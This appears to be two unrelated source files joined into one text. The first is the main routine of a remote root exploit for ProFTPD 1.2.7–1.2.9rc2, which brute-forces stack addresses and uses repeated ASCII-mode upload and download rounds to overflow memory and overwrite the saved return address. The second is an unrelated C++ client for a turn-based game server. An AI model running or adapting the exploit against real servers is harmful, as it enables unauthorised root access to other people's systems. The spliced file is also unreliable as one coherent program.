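/*
 * Entry point.  Parses the command line, then walks the candidate stack
 * addresses from -S (default STACK_START) up to STACK_END four bytes at a
 * time, running one upload/download round against the target per address.
 *
 * Options: -t target host (required), -l local IP (required), -u/-p
 * credentials, -U upload path (at most SIZE-1 bytes), -P FTP port (1-65535),
 * -S starting stack address in hex, -s sleep 10s before the first download.
 *
 * Returns 1 on a usage, connection or login error, or after every candidate
 * address has been tried.  Failures of the per-address FTP steps only abort
 * the current iteration (goto err) and move on to the next address.
 */
int main(int argc,char **argv)
{
    int sleepMode=0;
    int c;                      /* getopt() returns int; a plain char can never
                                   compare equal to -1 where char is unsigned */
    unsigned int stackStartAddr=STACK_START;
    char *end;
    long port;

    if(argc<2) {
        usage(argv[0]);
        return 1;
    }
    while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= -1) {
        switch (c) {
        case 't':
            server=optarg;
            break;
        case 'u':
            user=optarg;
            break;
        case 'p':
            pass=optarg;
            break;
        case 'l':
            localIP=optarg;
            break;
        case 's':
            sleepMode=1;
            break;
        case 'U':
            /* strncpy() leaves uploadPath unterminated when optarg fills all
               SIZE bytes; refuse such paths instead of truncating silently */
            if(strlen(optarg) >= SIZE) {
                fprintf(stderr, "Upload path too long (max %d bytes)\n", (int)(SIZE-1));
                return 1;
            }
            strncpy(uploadPath,optarg,SIZE);
            break;
        case 'P':
            /* atoi() accepted "abc" as port 0; parse strictly and range-check */
            port = strtol(optarg, &end, 10);
            if(*optarg=='\0' || *end!='\0' || port<1 || port>65535) {
                fprintf(stderr, "Invalid port: %s\n", optarg);
                return 1;
            }
            ftpPort=(int)port;
            break;
        case 'S':
            stackStartAddr=strtoul(optarg, &end, 16);
            if(*optarg=='\0' || *end!='\0') {
                fprintf(stderr, "Invalid stack address: %s\n", optarg);
                return 1;
            }
            break;
        default:
            usage(argv[0]);
            return 1;
        }
    }
    if(server==NULL || localIP==NULL) {
        usage(argv[0]);
        return 1;
    }

    printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
    printf(" by Haggis ([email protected])\n");

    doris_chroot_breaker();
    for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {

        if(check_for_linefeed()==FAILURE)
            continue;

        retAddr=stackWriteAddr+200; // good enough for show business

        /* Session 1: log in, build the buffer for this RET and upload it. */
        if((controlSock=connect_to_server(ftpPort))==FAILURE) {
            perror("\n\nFailing to connect to remote host\n");
            exit(1);
        }

        if(login_to_server()==FAILURE) {
            close(controlSock);
            printf("\nERROR: Login failed.\n");
            exit(1);
        }

        if(set_passive_mode(UPLOAD)==FAILURE)
            goto err;
        if(set_ascii_mode()==FAILURE)
            goto err;
        if(set_path_and_filename()==FAILURE)
            goto err;

        // create the buffer containing RET for this
        // brute-force iteration
        create_exploit_buffer();

        if(upload_file()==FAILURE)
            goto err;
        close(controlSock);

        // Session 2: log in again, set ASCII mode and download the file.
        // This triggers the overflow; it corrupts the session's memory pool
        // so that the second download below overwrites the stack area and
        // the saved EIP.
        if((controlSock=connect_to_server(ftpPort))==FAILURE) {
            perror("\nFailed to connect to remote host\n");
            exit(1);
        }

        /* Same no-argument call as session 1 (user/pass are globals set by
           getopt); the result was previously ignored, which let a failed
           login fall through into the download steps. */
        if(login_to_server()==FAILURE)
            goto err;
        if(set_path_and_filename()==FAILURE)
            goto err;
        if(set_ascii_mode()==FAILURE)
            goto err;
        if(set_passive_mode(DOWNLOAD)==FAILURE)
            goto err;
        if(sleepMode)
            sleep(10);
        if(download_file(NORMAL_DOWNLOAD)==FAILURE)
            goto err;

        // Finally, read the file again. This triggers the stack overwrite
        // (NOT the overflow, that happened earlier).
        if(set_passive_mode(DOWNLOAD)==FAILURE)
            goto err;
        if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
            goto err;
err:
        close(controlSock);
    }

    // Only reached when every candidate address failed.
    // TODO (carried from the original): the uploaded files are not removed
    // from the target here.
    printf("\n\nNo r00t for you today I'm afraid.\n");
    exit(1);
}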
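// Reads atom `index` (0 = the message tag) of a flat S-expression
// "(tag a b ...)".  Returns NULL when the expression or any link on the way
// is missing, so callers never dereference a short or malformed server
// message.
// NOTE(review): only the sexp_t fields this file already uses (list, next,
// val) are touched; the library's exact node layout is not visible here.
static const char* sexp_atom(const sexp_t* sx, int index)
{
	if(sx == NULL)
		return NULL;
	const sexp_t* node = sx->list;
	while(node != NULL && index > 0) {
		node = node->next;
		--index;
	}
	return (node != NULL) ? node->val : NULL;
}

// Builds the per-run log filename "<hour>.<minute>-<program>.gamelog", where
// <program> is argv[0] with spaces, path separators, dots and colons removed
// so the result is a bare filename in the working directory.
static std::string build_log_filename(const char* argv0)
{
	std::ostringstream stamp;
	time_t now = time(NULL);
	const tm* local = localtime(&now);
	if(local != NULL)
		stamp << local->tm_hour << "." << local->tm_min;
	else
		stamp << "0.0";

	std::string program(argv0 != NULL ? argv0 : "");
	std::string cleaned;
	cleaned.reserve(program.size());
	for(std::string::size_type i = 0; i < program.size(); ++i) {
		const char ch = program[i];
		if(ch == ' ' || ch == '/' || ch == '\\' || ch == '.' || ch == ':')
			continue;
		cleaned += ch;
	}
	return stamp.str() + "-" + cleaned + ".gamelog";
}

// Client entry point.  Usage: <server> <port> [game #].  Without a game
// number a new game is created and we play as player 1; with exactly one
// extra argument we join that game as player 2 and ask the server to start.
// The pre-game handshake runs until the first "new-turn"; the main loop then
// drains non-status traffic and acts on each "status" report while it is our
// turn.  Everything the server sends is untrusted: message fields are read
// through sexp_atom() and a NULL result from rec_sexp() ends the game, so a
// truncated or malformed message degrades to a warning rather than a crash.
// Returns 1 on a usage error or failed connection, 0 otherwise.
int main(int argc, char** argv)
{
	if(argc < 3) {
		std::cerr << (argv[0] != NULL ? argv[0] : "client") << " <server> <port> [game #]" << std::endl;
		return 1;
	}

	// Exactly one extra argument selects an existing game to join.
	const bool start_game = (argc != 4);
	bool end_game = false;

	int sock_server = open_server_connection(argv[1], argv[2]);
	if(sock_server == -1) {
		std::cerr << "Unable to connect to " << argv[1] << ":" << argv[2] << std::endl;
		return 1;
	}

	myAI gameAI;
	sexp_t* sexp = NULL;
	std::string whos_turn;

	// log into the server, using the AI's team name
	my_user_id = login_to_server(sock_server, gameAI.PlayerName());

	const std::string log_filename = build_log_filename(argv[0]);
	std::cout << "Filename: " << log_filename << std::endl;

#ifdef DEBUG
	std::cout << "DEBUG: logged in as user #" << my_user_id << std::endl;
#endif

	// Both roles use the same fixed base layout here.
	gameAI.myBase = coordinate(0,0);
	gameAI.enemyBase = coordinate(25,25);

	if(start_game) {
		gameAI.playerNumber = 1;
		create_game(sock_server);   // the returned game number is not needed
	} else {
		gameAI.playerNumber = 2;
		std::cout << "Trying to join game " << argv[3] << "..." << std::endl;
		send_string(sock_server, "(join-game " + std::string(argv[3]) + ")");
		sexp = rec_sexp(sock_server);
		if(sexp == NULL || !check_sexp(sexp, "join-accepted")) {
			std::cout << "Unabled to join game " << argv[3] << std::endl;
			goto GAME_SHUTDOWN;
		}
		// Only the player that just joined asks to start; the creator
		// must not, or the server misbehaves.
		send_string(sock_server, "(game-start)");
	}

	// Pre-game: the server sends a burst of messages.  Handle the ones we
	// know and keep reading until the first "new-turn".
	sexp = rec_sexp(sock_server);
	while(sexp != NULL && !check_sexp(sexp, "new-turn")) {
		if(check_sexp(sexp, "unit-types")) {
			// sent once, during initialization: details of each unit type
#ifdef DEBUG
			std::cout << "DEBUG: updating unit types" << std::endl;
#endif
			update_unit_types(&gameAI, sexp);
		} else if(check_sexp(sexp, "status")) {
			// an early status report may be partial; warn but keep going
			if(!game_status(gameAI, sexp, my_user_id))
				std::cout << "WARN: error parsing game status" << std::endl;
		}
		// "game-start-accepted" and anything unknown is ignored on purpose.
		sexp = rec_sexp(sock_server);
	}
	if(sexp == NULL) {
		std::cerr << "ERROR: connection lost before the first turn" << std::endl;
		goto GAME_SHUTDOWN;
	}

	// sexp is now the "new-turn" message; its second atom is the player id.
	{
		const char* first_turn = sexp_atom(sexp, 1);
		if(first_turn != NULL)
			whos_turn = first_turn;
		else
			std::cerr << "WARN: new-turn message carries no player id" << std::endl;
	}

#ifdef DEBUG
	std::cout << "DEBUG: got all our pregame stuff, starting main loop!" << std::endl;
#endif

	while(!end_game) {
		// Drain everything that isn't a status report: "game-over" ends the
		// game, "new-turn" updates whose turn it is, the rest is skipped.
		while(sexp != NULL && !check_sexp(sexp, "status")) {
#ifdef DEBUG
			{
				const char* tag = sexp_atom(sexp, 0);
				std::cout << "DEBUG: waiting for game status, got \"" << (tag != NULL ? tag : "?") << "\" message" << std::endl;
			}
#endif
			if(check_sexp(sexp, "game-over")) {
				const char* winner = sexp_atom(sexp, 1);
				std::cout << "Game Over: ";
				if(winner != NULL && std::string(winner) == my_user_id)
					std::cout << "You Win!";
				else
					std::cout << "You Lose...";
				std::cout << std::endl;
				end_game = true;
				goto GAME_SHUTDOWN;
			}

			if(check_sexp(sexp, "new-turn")) {
				const char* next_turn = sexp_atom(sexp, 1);
				if(next_turn != NULL)
					whos_turn = next_turn;
#ifdef DEBUG
				std::cout << "DEBUG: It's player " << whos_turn << "'s turn" << std::endl;
#endif
			}

			sexp = rec_sexp(sock_server);
		}
		if(sexp == NULL) {
			std::cerr << "ERROR: connection lost while waiting for game status" << std::endl;
			goto GAME_SHUTDOWN;
		}

		if(!game_status(gameAI, sexp, my_user_id))
			std::cerr << "WARN: couldn't parse game status!" << std::endl;

		// The turn number is the head of the nested list in the status
		// message's second field (sexp->list->next->list->val); keep the
		// previous value when that field is missing.
		{
			const sexp_t* field = (sexp->list != NULL) ? sexp->list->next : NULL;
			const sexp_t* inner = (field != NULL) ? field->list : NULL;
			if(inner != NULL && inner->val != NULL)
				gameAI.turnNumber = atoi(inner->val);
			else
				std::cerr << "WARN: status message carries no turn number" << std::endl;
		}

		if(whos_turn == my_user_id) {
			// Run the custom Play() and ship every queued order.  Replies,
			// if any, are handled at the top of the next iteration.
			gameAI.Play();
			while(!gameAI.orders.empty()) {
				send_string(sock_server, gameAI.orders.front().s_expression);
				gameAI.orders.pop();
			}
			send_string(sock_server, "(end-turn)");
		}
		// Not our turn: nothing to do but read the next message.

		sexp = rec_sexp(sock_server);
	}

GAME_SHUTDOWN:
	std::cout << "Shutting down..." << std::endl;
	send_string(sock_server, "(leave-game)");
	rec_sexp(sock_server);              // acknowledgement; content unused
	send_string(sock_server, "(logout)");
	rec_sexp(sock_server);
	// NOTE(review): messages returned by rec_sexp() are never released in
	// this function; if the S-expression library expects an explicit
	// destroy call, one node per message leaks -- confirm against its API.

#ifdef WIN32
	closesocket(sock_server);
#else
	close(sock_server);
#endif

	// The game log is only written here, after the socket is closed; a
	// crash mid-game loses it.
	log_file.open(log_filename.c_str());
	if(log_file.fail())
	{
		std::cout << "Error writing to log file" << std::endl;
	}
	else
	{
		log_file << log_stream.str();
		log_file.close();
	}

	return 0;
}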